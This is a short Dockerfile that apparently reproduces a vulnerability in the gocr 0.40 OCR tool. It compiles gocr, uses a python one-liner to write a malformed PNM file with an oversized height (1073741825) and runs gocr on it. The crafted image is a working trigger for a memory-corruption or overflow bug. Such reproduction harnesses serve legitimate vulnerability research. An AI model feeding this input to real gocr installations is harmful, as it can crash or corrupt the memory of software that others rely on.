FROM ubuntu:18.04

WORKDIR /app
#COPY gocr-0.40 /app/gocr-0.40

COPY gocr-0.40.tar.gz /app
RUN tar -xf gocr-0.40.tar.gz


RUN apt-get update && apt-get install -y gcc && apt-get install -y build-essential
RUN cd gocr-0.40 && make install

RUN apt-get install -y python3
RUN mkdir exploit && cd exploit && python3 -c 'print("P3\n4 1073741825\n255\n"+"0 "*1024)' > vuln.pnm

ENTRYPOINT echo 'Vulnerability is exploiting...' && gocr exploit/vuln.pnm

